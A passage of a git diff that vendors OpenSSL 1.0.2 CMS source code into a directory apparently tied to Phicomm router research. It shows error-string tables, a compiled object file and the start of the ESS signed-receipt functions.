+    {ERR_FUNC(CMS_F_CMS_DATAFINAL), "CMS_dataFinal"},
+    {ERR_FUNC(CMS_F_CMS_DATAINIT), "CMS_dataInit"},
+    {ERR_FUNC(CMS_F_CMS_DECRYPT), "CMS_decrypt"},
+    {ERR_FUNC(CMS_F_CMS_DECRYPT_SET1_KEY), "CMS_decrypt_set1_key"},
+    {ERR_FUNC(CMS_F_CMS_DECRYPT_SET1_PASSWORD), "CMS_decrypt_set1_password"},
+    {ERR_FUNC(CMS_F_CMS_DECRYPT_SET1_PKEY), "CMS_decrypt_set1_pkey"},
+    {ERR_FUNC(CMS_F_CMS_DIGESTALGORITHM_FIND_CTX),
+     "cms_DigestAlgorithm_find_ctx"},
+    {ERR_FUNC(CMS_F_CMS_DIGESTALGORITHM_INIT_BIO),
+     "cms_DigestAlgorithm_init_bio"},
+    {ERR_FUNC(CMS_F_CMS_DIGESTEDDATA_DO_FINAL), "cms_DigestedData_do_final"},
+    {ERR_FUNC(CMS_F_CMS_DIGEST_VERIFY), "CMS_digest_verify"},
+    {ERR_FUNC(CMS_F_CMS_ENCODE_RECEIPT), "cms_encode_Receipt"},
+    {ERR_FUNC(CMS_F_CMS_ENCRYPT), "CMS_encrypt"},
+    {ERR_FUNC(CMS_F_CMS_ENCRYPTEDCONTENT_INIT_BIO),
+     "cms_EncryptedContent_init_bio"},
+    {ERR_FUNC(CMS_F_CMS_ENCRYPTEDDATA_DECRYPT), "CMS_EncryptedData_decrypt"},
+    {ERR_FUNC(CMS_F_CMS_ENCRYPTEDDATA_ENCRYPT), "CMS_EncryptedData_encrypt"},
+    {ERR_FUNC(CMS_F_CMS_ENCRYPTEDDATA_SET1_KEY),
+     "CMS_EncryptedData_set1_key"},
+    {ERR_FUNC(CMS_F_CMS_ENVELOPEDDATA_CREATE), "CMS_EnvelopedData_create"},
+    {ERR_FUNC(CMS_F_CMS_ENVELOPEDDATA_INIT_BIO),
+     "cms_EnvelopedData_init_bio"},
+    {ERR_FUNC(CMS_F_CMS_ENVELOPED_DATA_INIT), "CMS_ENVELOPED_DATA_INIT"},
+    {ERR_FUNC(CMS_F_CMS_ENV_ASN1_CTRL), "cms_env_asn1_ctrl"},
+    {ERR_FUNC(CMS_F_CMS_FINAL), "CMS_final"},
+    {ERR_FUNC(CMS_F_CMS_GET0_CERTIFICATE_CHOICES),
+     "CMS_GET0_CERTIFICATE_CHOICES"},
+    {ERR_FUNC(CMS_F_CMS_GET0_CONTENT), "CMS_get0_content"},
+    {ERR_FUNC(CMS_F_CMS_GET0_ECONTENT_TYPE), "CMS_GET0_ECONTENT_TYPE"},
+    {ERR_FUNC(CMS_F_CMS_GET0_ENVELOPED), "cms_get0_enveloped"},
+    {ERR_FUNC(CMS_F_CMS_GET0_REVOCATION_CHOICES),
+     "CMS_GET0_REVOCATION_CHOICES"},
+    {ERR_FUNC(CMS_F_CMS_GET0_SIGNED), "CMS_GET0_SIGNED"},
+    {ERR_FUNC(CMS_F_CMS_MSGSIGDIGEST_ADD1), "cms_msgSigDigest_add1"},
+    {ERR_FUNC(CMS_F_CMS_RECEIPTREQUEST_CREATE0),
+     "CMS_ReceiptRequest_create0"},
+    {ERR_FUNC(CMS_F_CMS_RECEIPT_VERIFY), "cms_Receipt_verify"},
+    {ERR_FUNC(CMS_F_CMS_RECIPIENTINFO_DECRYPT), "CMS_RecipientInfo_decrypt"},
+    {ERR_FUNC(CMS_F_CMS_RECIPIENTINFO_ENCRYPT), "CMS_RecipientInfo_encrypt"},
+    {ERR_FUNC(CMS_F_CMS_RECIPIENTINFO_KARI_ENCRYPT),
+     "cms_RecipientInfo_kari_encrypt"},
+    {ERR_FUNC(CMS_F_CMS_RECIPIENTINFO_KARI_GET0_ALG),
+     "CMS_RecipientInfo_kari_get0_alg"},
+    {ERR_FUNC(CMS_F_CMS_RECIPIENTINFO_KARI_GET0_ORIG_ID),
+     "CMS_RecipientInfo_kari_get0_orig_id"},
+    {ERR_FUNC(CMS_F_CMS_RECIPIENTINFO_KARI_GET0_REKS),
+     "CMS_RecipientInfo_kari_get0_reks"},
+    {ERR_FUNC(CMS_F_CMS_RECIPIENTINFO_KARI_ORIG_ID_CMP),
+     "CMS_RecipientInfo_kari_orig_id_cmp"},
+    {ERR_FUNC(CMS_F_CMS_RECIPIENTINFO_KEKRI_DECRYPT),
+     "CMS_RECIPIENTINFO_KEKRI_DECRYPT"},
+    {ERR_FUNC(CMS_F_CMS_RECIPIENTINFO_KEKRI_ENCRYPT),
+     "CMS_RECIPIENTINFO_KEKRI_ENCRYPT"},
+    {ERR_FUNC(CMS_F_CMS_RECIPIENTINFO_KEKRI_GET0_ID),
+     "CMS_RecipientInfo_kekri_get0_id"},
+    {ERR_FUNC(CMS_F_CMS_RECIPIENTINFO_KEKRI_ID_CMP),
+     "CMS_RecipientInfo_kekri_id_cmp"},
+    {ERR_FUNC(CMS_F_CMS_RECIPIENTINFO_KTRI_CERT_CMP),
+     "CMS_RecipientInfo_ktri_cert_cmp"},
+    {ERR_FUNC(CMS_F_CMS_RECIPIENTINFO_KTRI_DECRYPT),
+     "CMS_RECIPIENTINFO_KTRI_DECRYPT"},
+    {ERR_FUNC(CMS_F_CMS_RECIPIENTINFO_KTRI_ENCRYPT),
+     "CMS_RECIPIENTINFO_KTRI_ENCRYPT"},
+    {ERR_FUNC(CMS_F_CMS_RECIPIENTINFO_KTRI_GET0_ALGS),
+     "CMS_RecipientInfo_ktri_get0_algs"},
+    {ERR_FUNC(CMS_F_CMS_RECIPIENTINFO_KTRI_GET0_SIGNER_ID),
+     "CMS_RecipientInfo_ktri_get0_signer_id"},
+    {ERR_FUNC(CMS_F_CMS_RECIPIENTINFO_PWRI_CRYPT),
+     "cms_RecipientInfo_pwri_crypt"},
+    {ERR_FUNC(CMS_F_CMS_RECIPIENTINFO_SET0_KEY),
+     "CMS_RecipientInfo_set0_key"},
+    {ERR_FUNC(CMS_F_CMS_RECIPIENTINFO_SET0_PASSWORD),
+     "CMS_RecipientInfo_set0_password"},
+    {ERR_FUNC(CMS_F_CMS_RECIPIENTINFO_SET0_PKEY),
+     "CMS_RecipientInfo_set0_pkey"},
+    {ERR_FUNC(CMS_F_CMS_SD_ASN1_CTRL), "CMS_SD_ASN1_CTRL"},
+    {ERR_FUNC(CMS_F_CMS_SET1_IAS), "cms_set1_ias"},
+    {ERR_FUNC(CMS_F_CMS_SET1_KEYID), "cms_set1_keyid"},
+    {ERR_FUNC(CMS_F_CMS_SET1_SIGNERIDENTIFIER), "cms_set1_SignerIdentifier"},
+    {ERR_FUNC(CMS_F_CMS_SET_DETACHED), "CMS_set_detached"},
+    {ERR_FUNC(CMS_F_CMS_SIGN), "CMS_sign"},
+    {ERR_FUNC(CMS_F_CMS_SIGNED_DATA_INIT), "CMS_SIGNED_DATA_INIT"},
+    {ERR_FUNC(CMS_F_CMS_SIGNERINFO_CONTENT_SIGN),
+     "CMS_SIGNERINFO_CONTENT_SIGN"},
+    {ERR_FUNC(CMS_F_CMS_SIGNERINFO_SIGN), "CMS_SignerInfo_sign"},
+    {ERR_FUNC(CMS_F_CMS_SIGNERINFO_VERIFY), "CMS_SignerInfo_verify"},
+    {ERR_FUNC(CMS_F_CMS_SIGNERINFO_VERIFY_CERT),
+     "CMS_SIGNERINFO_VERIFY_CERT"},
+    {ERR_FUNC(CMS_F_CMS_SIGNERINFO_VERIFY_CONTENT),
+     "CMS_SignerInfo_verify_content"},
+    {ERR_FUNC(CMS_F_CMS_SIGN_RECEIPT), "CMS_sign_receipt"},
+    {ERR_FUNC(CMS_F_CMS_STREAM), "CMS_stream"},
+    {ERR_FUNC(CMS_F_CMS_UNCOMPRESS), "CMS_uncompress"},
+    {ERR_FUNC(CMS_F_CMS_VERIFY), "CMS_verify"},
+    {0, NULL}
+};
+
+static ERR_STRING_DATA CMS_str_reasons[] = {
+    {ERR_REASON(CMS_R_ADD_SIGNER_ERROR), "add signer error"},
+    {ERR_REASON(CMS_R_CERTIFICATE_ALREADY_PRESENT),
+     "certificate already present"},
+    {ERR_REASON(CMS_R_CERTIFICATE_HAS_NO_KEYID), "certificate has no keyid"},
+    {ERR_REASON(CMS_R_CERTIFICATE_VERIFY_ERROR), "certificate verify error"},
+    {ERR_REASON(CMS_R_CIPHER_INITIALISATION_ERROR),
+     "cipher initialisation error"},
+    {ERR_REASON(CMS_R_CIPHER_PARAMETER_INITIALISATION_ERROR),
+     "cipher parameter initialisation error"},
+    {ERR_REASON(CMS_R_CMS_DATAFINAL_ERROR), "cms datafinal error"},
+    {ERR_REASON(CMS_R_CMS_LIB), "cms lib"},
+    {ERR_REASON(CMS_R_CONTENTIDENTIFIER_MISMATCH),
+     "contentidentifier mismatch"},
+    {ERR_REASON(CMS_R_CONTENT_NOT_FOUND), "content not found"},
+    {ERR_REASON(CMS_R_CONTENT_TYPE_MISMATCH), "content type mismatch"},
+    {ERR_REASON(CMS_R_CONTENT_TYPE_NOT_COMPRESSED_DATA),
+     "content type not compressed data"},
+    {ERR_REASON(CMS_R_CONTENT_TYPE_NOT_ENVELOPED_DATA),
+     "content type not enveloped data"},
+    {ERR_REASON(CMS_R_CONTENT_TYPE_NOT_SIGNED_DATA),
+     "content type not signed data"},
+    {ERR_REASON(CMS_R_CONTENT_VERIFY_ERROR), "content verify error"},
+    {ERR_REASON(CMS_R_CTRL_ERROR), "ctrl error"},
+    {ERR_REASON(CMS_R_CTRL_FAILURE), "ctrl failure"},
+    {ERR_REASON(CMS_R_DECRYPT_ERROR), "decrypt error"},
+    {ERR_REASON(CMS_R_DIGEST_ERROR), "digest error"},
+    {ERR_REASON(CMS_R_ERROR_GETTING_PUBLIC_KEY), "error getting public key"},
+    {ERR_REASON(CMS_R_ERROR_READING_MESSAGEDIGEST_ATTRIBUTE),
+     "error reading messagedigest attribute"},
+    {ERR_REASON(CMS_R_ERROR_SETTING_KEY), "error setting key"},
+    {ERR_REASON(CMS_R_ERROR_SETTING_RECIPIENTINFO),
+     "error setting recipientinfo"},
+    {ERR_REASON(CMS_R_INVALID_ENCRYPTED_KEY_LENGTH),
+     "invalid encrypted key length"},
+    {ERR_REASON(CMS_R_INVALID_KEY_ENCRYPTION_PARAMETER),
+     "invalid key encryption parameter"},
+    {ERR_REASON(CMS_R_INVALID_KEY_LENGTH), "invalid key length"},
+    {ERR_REASON(CMS_R_MD_BIO_INIT_ERROR), "md bio init error"},
+    {ERR_REASON(CMS_R_MESSAGEDIGEST_ATTRIBUTE_WRONG_LENGTH),
+     "messagedigest attribute wrong length"},
+    {ERR_REASON(CMS_R_MESSAGEDIGEST_WRONG_LENGTH),
+     "messagedigest wrong length"},
+    {ERR_REASON(CMS_R_MSGSIGDIGEST_ERROR), "msgsigdigest error"},
+    {ERR_REASON(CMS_R_MSGSIGDIGEST_VERIFICATION_FAILURE),
+     "msgsigdigest verification failure"},
+    {ERR_REASON(CMS_R_MSGSIGDIGEST_WRONG_LENGTH),
+     "msgsigdigest wrong length"},
+    {ERR_REASON(CMS_R_NEED_ONE_SIGNER), "need one signer"},
+    {ERR_REASON(CMS_R_NOT_A_SIGNED_RECEIPT), "not a signed receipt"},
+    {ERR_REASON(CMS_R_NOT_ENCRYPTED_DATA), "not encrypted data"},
+    {ERR_REASON(CMS_R_NOT_KEK), "not kek"},
+    {ERR_REASON(CMS_R_NOT_KEY_AGREEMENT), "not key agreement"},
+    {ERR_REASON(CMS_R_NOT_KEY_TRANSPORT), "not key transport"},
+    {ERR_REASON(CMS_R_NOT_PWRI), "not pwri"},
+    {ERR_REASON(CMS_R_NOT_SUPPORTED_FOR_THIS_KEY_TYPE),
+     "not supported for this key type"},
+    {ERR_REASON(CMS_R_NO_CIPHER), "no cipher"},
+    {ERR_REASON(CMS_R_NO_CONTENT), "no content"},
+    {ERR_REASON(CMS_R_NO_CONTENT_TYPE), "no content type"},
+    {ERR_REASON(CMS_R_NO_DEFAULT_DIGEST), "no default digest"},
+    {ERR_REASON(CMS_R_NO_DIGEST_SET), "no digest set"},
+    {ERR_REASON(CMS_R_NO_KEY), "no key"},
+    {ERR_REASON(CMS_R_NO_KEY_OR_CERT), "no key or cert"},
+    {ERR_REASON(CMS_R_NO_MATCHING_DIGEST), "no matching digest"},
+    {ERR_REASON(CMS_R_NO_MATCHING_RECIPIENT), "no matching recipient"},
+    {ERR_REASON(CMS_R_NO_MATCHING_SIGNATURE), "no matching signature"},
+    {ERR_REASON(CMS_R_NO_MSGSIGDIGEST), "no msgsigdigest"},
+    {ERR_REASON(CMS_R_NO_PASSWORD), "no password"},
+    {ERR_REASON(CMS_R_NO_PRIVATE_KEY), "no private key"},
+    {ERR_REASON(CMS_R_NO_PUBLIC_KEY), "no public key"},
+    {ERR_REASON(CMS_R_NO_RECEIPT_REQUEST), "no receipt request"},
+    {ERR_REASON(CMS_R_NO_SIGNERS), "no signers"},
+    {ERR_REASON(CMS_R_PRIVATE_KEY_DOES_NOT_MATCH_CERTIFICATE),
+     "private key does not match certificate"},
+    {ERR_REASON(CMS_R_RECEIPT_DECODE_ERROR), "receipt decode error"},
+    {ERR_REASON(CMS_R_RECIPIENT_ERROR), "recipient error"},
+    {ERR_REASON(CMS_R_SIGNER_CERTIFICATE_NOT_FOUND),
+     "signer certificate not found"},
+    {ERR_REASON(CMS_R_SIGNFINAL_ERROR), "signfinal error"},
+    {ERR_REASON(CMS_R_SMIME_TEXT_ERROR), "smime text error"},
+    {ERR_REASON(CMS_R_STORE_INIT_ERROR), "store init error"},
+    {ERR_REASON(CMS_R_TYPE_NOT_COMPRESSED_DATA), "type not compressed data"},
+    {ERR_REASON(CMS_R_TYPE_NOT_DATA), "type not data"},
+    {ERR_REASON(CMS_R_TYPE_NOT_DIGESTED_DATA), "type not digested data"},
+    {ERR_REASON(CMS_R_TYPE_NOT_ENCRYPTED_DATA), "type not encrypted data"},
+    {ERR_REASON(CMS_R_TYPE_NOT_ENVELOPED_DATA), "type not enveloped data"},
+    {ERR_REASON(CMS_R_UNABLE_TO_FINALIZE_CONTEXT),
+     "unable to finalize context"},
+    {ERR_REASON(CMS_R_UNKNOWN_CIPHER), "unknown cipher"},
+    {ERR_REASON(CMS_R_UNKNOWN_DIGEST_ALGORIHM), "unknown digest algorihm"},
+    {ERR_REASON(CMS_R_UNKNOWN_ID), "unknown id"},
+    {ERR_REASON(CMS_R_UNSUPPORTED_COMPRESSION_ALGORITHM),
+     "unsupported compression algorithm"},
+    {ERR_REASON(CMS_R_UNSUPPORTED_CONTENT_TYPE), "unsupported content type"},
+    {ERR_REASON(CMS_R_UNSUPPORTED_KEK_ALGORITHM),
+     "unsupported kek algorithm"},
+    {ERR_REASON(CMS_R_UNSUPPORTED_KEY_ENCRYPTION_ALGORITHM),
+     "unsupported key encryption algorithm"},
+    {ERR_REASON(CMS_R_UNSUPPORTED_RECIPIENT_TYPE),
+     "unsupported recipient type"},
+    {ERR_REASON(CMS_R_UNSUPPORTED_RECPIENTINFO_TYPE),
+     "unsupported recpientinfo type"},
+    {ERR_REASON(CMS_R_UNSUPPORTED_TYPE), "unsupported type"},
+    {ERR_REASON(CMS_R_UNWRAP_ERROR), "unwrap error"},
+    {ERR_REASON(CMS_R_UNWRAP_FAILURE), "unwrap failure"},
+    {ERR_REASON(CMS_R_VERIFICATION_FAILURE), "verification failure"},
+    {ERR_REASON(CMS_R_WRAP_ERROR), "wrap error"},
+    {0, NULL}
+};
+
+#endif
+
+void ERR_load_CMS_strings(void)
+{
+#ifndef OPENSSL_NO_ERR
+
+    if (ERR_func_error_string(CMS_str_functs[0].error) == NULL) {
+        ERR_load_strings(0, CMS_str_functs);
+        ERR_load_strings(0, CMS_str_reasons);
+    }
+#endif
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cms/cms_err.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cms/cms_err.o
new file mode 100644
index 0000000000000000000000000000000000000000..e19f8f6bcc6348cbb51632b18cd4ec79fbf28e98
GIT binary patch
literal 1360
zcmbtS%}T>S5S}z@>ks&Y2SJf|Qc;)IA4CsQDAkLKR0>`sq&2o;la^!y>Oo(jkK!W;
zzJQP6QSs(QXPVu(T`PhPOlIcW`Q|6Pcg6kPlwp7r19spmk|@AY>dVh}+&qlHFuaY<
zzCXfVp|EW&lq-?XBWsJTvFu82GwOu7+tn<~t}n(g^dWZ)wI6lwunbuCfiM%5WHL5j
z+?2q$8Z)Lx(wR06MEHz2BkpfPJM_WpN3T4y=Y}+cvZO*Zlj#%?U9+=AH%5^O1K+_8
zp8f%+KhQ117)~g2COcQX&~}4>RiRia*^Q=iW)}{Q?T`l-ek}w`l%Y+!wqfD5$DIl=
z%#3YadfdI@z|I`*0IP%{uxiuuTpuyN$z6umv=VZsdMV<XAF)=@Y`Foy1{Sythq-n8
zJa9Z$H2;U0MlRi*{s;4-X7V3IOu4GeVL+ICPx7oN9nI?ec|6ac{*}LsT&kHxRYmq+
zQbF`(e`z-qOigX6f#OS^gs2a_vaY+wSn@6ORiRx~ImLi#>io7y()ZH&CzwaCIWO|1
zc@l$831AQ{%_;d3@70?q5A;EKi46>)r5ZY)F#Ya`axeN@6euF#1Q|!K7ynr#){@NF
G(fOa@T2HS4

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cms/cms_ess.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cms/cms_ess.c
new file mode 100644
index 0000000..8631a2e
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cms/cms_ess.c
@@ -0,0 +1,395 @@
+/* crypto/cms/cms_ess.c */
+/*
+ * Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL
+ * project.
+ */
+/* ====================================================================
+ * Copyright (c) 2008 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ */
+
+#include "cryptlib.h"
+#include <openssl/asn1t.h>
+#include <openssl/pem.h>
+#include <openssl/rand.h>
+#include <openssl/x509v3.h>
+#include <openssl/err.h>
+#include <openssl/cms.h>
+#include "cms_lcl.h"
+
+DECLARE_ASN1_ITEM(CMS_ReceiptRequest)
+DECLARE_ASN1_ITEM(CMS_Receipt)
+
+IMPLEMENT_ASN1_FUNCTIONS(CMS_ReceiptRequest)
+
+/* ESS services: for now just Signed Receipt related */
+
+int CMS_get1_ReceiptRequest(CMS_SignerInfo *si, CMS_ReceiptRequest **prr)
+{
+    ASN1_STRING *str;
+    CMS_ReceiptRequest *rr = NULL;
+    if (prr)
+        *prr = NULL;
+    str = CMS_signed_get0_data_by_OBJ(si,
+                                      OBJ_nid2obj
+                                      (NID_id_smime_aa_receiptRequest), -3,
+                                      V_ASN1_SEQUENCE);
+    if (!str)
+        return 0;
+
+    rr = ASN1_item_unpack(str, ASN1_ITEM_rptr(CMS_ReceiptRequest));
+    if (!rr)
+        return -1;
+    if (prr)
+        *prr = rr;
+    else
+        CMS_ReceiptRequest_free(rr);
+    return 1;
+}
+
+CMS_ReceiptRequest *CMS_ReceiptRequest_create0(unsigned char *id, int idlen,
+                                               int allorfirst,
+                                               STACK_OF(GENERAL_NAMES)
+                                               *receiptList, STACK_OF(GENERAL_NAMES)
+                                               *receiptsTo)
+{
+    CMS_ReceiptRequest *rr = NULL;
+
+    rr = CMS_ReceiptRequest_new();
+    if (!rr)
+        goto merr;
+    if (id)
+        ASN1_STRING_set0(rr->signedContentIdentifier, id, idlen);
+    else {
+        if (!ASN1_STRING_set(rr->signedContentIdentifier, NULL, 32))
+            goto merr;
+        if (RAND_pseudo_bytes(rr->signedContentIdentifier->data, 32)
+            <= 0)
+            goto err;
+    }
+
+    sk_GENERAL_NAMES_pop_free(rr->receiptsTo, GENERAL_NAMES_free);
+    rr->receiptsTo = receiptsTo;
+
+    if (receiptList) {
+        rr->receiptsFrom->type = 1;
+        rr->receiptsFrom->d.receiptList = receiptList;
+    } else {
+        rr->receiptsFrom->type = 0;
+        rr->receiptsFrom->d.allOrFirstTier = allorfirst;
+    }
+
+    return rr;
+
+ merr:
+    CMSerr(CMS_F_CMS_RECEIPTREQUEST_CREATE0, ERR_R_MALLOC_FAILURE);
+
+ err:
+    if (rr)
+        CMS_ReceiptRequest_free(rr);
+
+    return NULL;
+
+}
+
+int CMS_add1_ReceiptRequest(CMS_SignerInfo *si, CMS_ReceiptRequest *rr)
+{
+    unsigned char *rrder = NULL;
+    int rrderlen, r = 0;
+
+    rrderlen = i2d_CMS_ReceiptRequest(rr, &rrder);
+    if (rrderlen < 0)
+        goto merr;
+
+    if (!CMS_signed_add1_attr_by_NID(si, NID_id_smime_aa_receiptRequest,
+                                     V_ASN1_SEQUENCE, rrder, rrderlen))
+        goto merr;
+
+    r = 1;
+
+ merr:
+    if (!r)
+        CMSerr(CMS_F_CMS_ADD1_RECEIPTREQUEST, ERR_R_MALLOC_FAILURE);
+
+    if (rrder)
+        OPENSSL_free(rrder);
+
+    return r;
+
+}
+
+void CMS_ReceiptRequest_get0_values(CMS_ReceiptRequest *rr,
+                                    ASN1_STRING **pcid,
+                                    int *pallorfirst,
+                                    STACK_OF(GENERAL_NAMES) **plist,
+                                    STACK_OF(GENERAL_NAMES) **prto)
+{
+    if (pcid)
+        *pcid = rr->signedContentIdentifier;
+    if (rr->receiptsFrom->type == 0) {
+        if (pallorfirst)
+            *pallorfirst = (int)rr->receiptsFrom->d.allOrFirstTier;
+        if (plist)
+            *plist = NULL;
+    } else {
+        if (pallorfirst)
+            *pallorfirst = -1;
+        if (plist)
+            *plist = rr->receiptsFrom->d.receiptList;
+    }
+    if (prto)
+        *prto = rr->receiptsTo;
+}
+
+/* Digest a SignerInfo structure for msgSigDigest attribute processing */
+
+static int cms_msgSigDigest(CMS_SignerInfo *si,
+                            unsigned char *dig, unsigned int *diglen)
+{
+    const EVP_MD *md;
+    md = EVP_get_digestbyobj(si->digestAlgorithm->algorithm);
+    if (md == NULL)
+        return 0;
+    if (!ASN1_item_digest(ASN1_ITEM_rptr(CMS_Attributes_Verify), md,
+                          si->signedAttrs, dig, diglen))
+        return 0;
+    return 1;
+}
+
+/* Add a msgSigDigest attribute to a SignerInfo */
+
+int cms_msgSigDigest_add1(CMS_SignerInfo *dest, CMS_SignerInfo *src)
+{
+    unsigned char dig[EVP_MAX_MD_SIZE];
+    unsigned int diglen;
+    if (!cms_msgSigDigest(src, dig, &diglen)) {
+        CMSerr(CMS_F_CMS_MSGSIGDIGEST_ADD1, CMS_R_MSGSIGDIGEST_ERROR);
+        return 0;
+    }
+    if (!CMS_signed_add1_attr_by_NID(dest, NID_id_smime_aa_msgSigDigest,
+                                     V_ASN1_OCTET_STRING, dig, diglen)) {
+        CMSerr(CMS_F_CMS_MSGSIGDIGEST_ADD1, ERR_R_MALLOC_FAILURE);
+        return 0;
+    }
+    return 1;
+}
+
+/* Verify signed receipt after it has already passed normal CMS verify */
+
+int cms_Receipt_verify(CMS_ContentInfo *cms, CMS_ContentInfo *req_cms)
+{
+    int r = 0, i;
+    CMS_ReceiptRequest *rr = NULL;
+    CMS_Receipt *rct = NULL;
+    STACK_OF(CMS_SignerInfo) *sis, *osis;
+    CMS_SignerInfo *si, *osi = NULL;
+    ASN1_OCTET_STRING *msig, **pcont;
+    ASN1_OBJECT *octype;
+    unsigned char dig[EVP_MAX_MD_SIZE];
+    unsigned int diglen;
+
+    /* Get SignerInfos, also checks SignedData content type */
+    osis = CMS_get0_SignerInfos(req_cms);
+    sis = CMS_get0_SignerInfos(cms);
+    if (!osis || !sis)
+        goto err;
+
+    if (sk_CMS_SignerInfo_num(sis) != 1) {
+        CMSerr(CMS_F_CMS_RECEIPT_VERIFY, CMS_R_NEED_ONE_SIGNER);
+        goto err;
+    }
+
+    /* Check receipt content type */
+    if (OBJ_obj2nid(CMS_get0_eContentType(cms)) != NID_id_smime_ct_receipt) {
+        CMSerr(CMS_F_CMS_RECEIPT_VERIFY, CMS_R_NOT_A_SIGNED_RECEIPT);
+        goto err;
+    }
+
+    /* Extract and decode receipt content */
+    pcont = CMS_get0_content(cms);
+    if (!pcont || !*pcont) {
+        CMSerr(CMS_F_CMS_RECEIPT_VERIFY, CMS_R_NO_CONTENT);
+        goto err;
+    }
+
+    rct = ASN1_item_unpack(*pcont, ASN1_ITEM_rptr(CMS_Receipt));
+
+    if (!rct) {
+        CMSerr(CMS_F_CMS_RECEIPT_VERIFY, CMS_R_RECEIPT_DECODE_ERROR);
+        goto err;
+    }
+
+    /* Locate original request */
+
+    for (i = 0; i < sk_CMS_SignerInfo_num(osis); i++) {
+        osi = sk_CMS_SignerInfo_value(osis, i);
+        if (!ASN1_STRING_cmp(osi->signature, rct->originatorSignatureValue))
+            break;
+    }
+
+    if (i == sk_CMS_SignerInfo_num(osis)) {
+        CMSerr(CMS_F_CMS_RECEIPT_VERIFY, CMS_R_NO_MATCHING_SIGNATURE);
+        goto err;
+    }
+
+    si = sk_CMS_SignerInfo_value(sis, 0);
+
+    /* Get msgSigDigest value and compare */
+
+    msig = CMS_signed_get0_data_by_OBJ(si,
+                                       OBJ_nid2obj
+                                       (NID_id_smime_aa_msgSigDigest), -3,
+                                       V_ASN1_OCTET_STRING);
+
+    if (!msig) {
+        CMSerr(CMS_F_CMS_RECEIPT_VERIFY, CMS_R_NO_MSGSIGDIGEST);
+        goto err;
+    }
+
+    if (!cms_msgSigDigest(osi, dig, &diglen)) {
+        CMSerr(CMS_F_CMS_RECEIPT_VERIFY, CMS_R_MSGSIGDIGEST_ERROR);
+        goto err;
+    }
+
+    if (diglen != (unsigned int)msig->length) {
+        CMSerr(CMS_F_CMS_RECEIPT_VERIFY, CMS_R_MSGSIGDIGEST_WRONG_LENGTH);
+        goto err;
+    }
+
+    if (memcmp(dig, msig->data, diglen)) {
+        CMSerr(CMS_F_CMS_RECEIPT_VERIFY,
+               CMS_R_MSGSIGDIGEST_VERIFICATION_FAILURE);
+        goto err;
+    }
+
+    /* Compare content types */
+
+    octype = CMS_signed_get0_data_by_OBJ(osi,
+                                         OBJ_nid2obj(NID_pkcs9_contentType),
+                                         -3, V_ASN1_OBJECT);
+    if (!octype) {
+        CMSerr(CMS_F_CMS_RECEIPT_VERIFY, CMS_R_NO_CONTENT_TYPE);
+        goto err;
+    }
+
+    /* Compare details in receipt request */
+
+    if (OBJ_cmp(octype, rct->contentType)) {
+        CMSerr(CMS_F_CMS_RECEIPT_VERIFY, CMS_R_CONTENT_TYPE_MISMATCH);
+        goto err;
+    }
+
+    /* Get original receipt request details */
+
+    if (CMS_get1_ReceiptRequest(osi, &rr) <= 0) {
+        CMSerr(CMS_F_CMS_RECEIPT_VERIFY, CMS_R_NO_RECEIPT_REQUEST);
+        goto err;
+    }
+
+    if (ASN1_STRING_cmp(rr->signedContentIdentifier,
+                        rct->signedContentIdentifier)) {
+        CMSerr(CMS_F_CMS_RECEIPT_VERIFY, CMS_R_CONTENTIDENTIFIER_MISMATCH);
+        goto err;
+    }
+
+    r = 1;
+
+ err:
+    if (rr)
+        CMS_ReceiptRequest_free(rr);
+    if (rct)
+        M_ASN1_free_of(rct, CMS_Receipt);
+
+    return r;
+
+}
+
+/*
+ * Encode a Receipt into an OCTET STRING read for including into content of a
+ * SignedData ContentInfo.
+ */
+
+ASN1_OCTET_STRING *cms_encode_Receipt(CMS_SignerInfo *si)
+{
+    CMS_Receipt rct;
+    CMS_ReceiptRequest *rr = NULL;
+    ASN1_OBJECT *ctype;
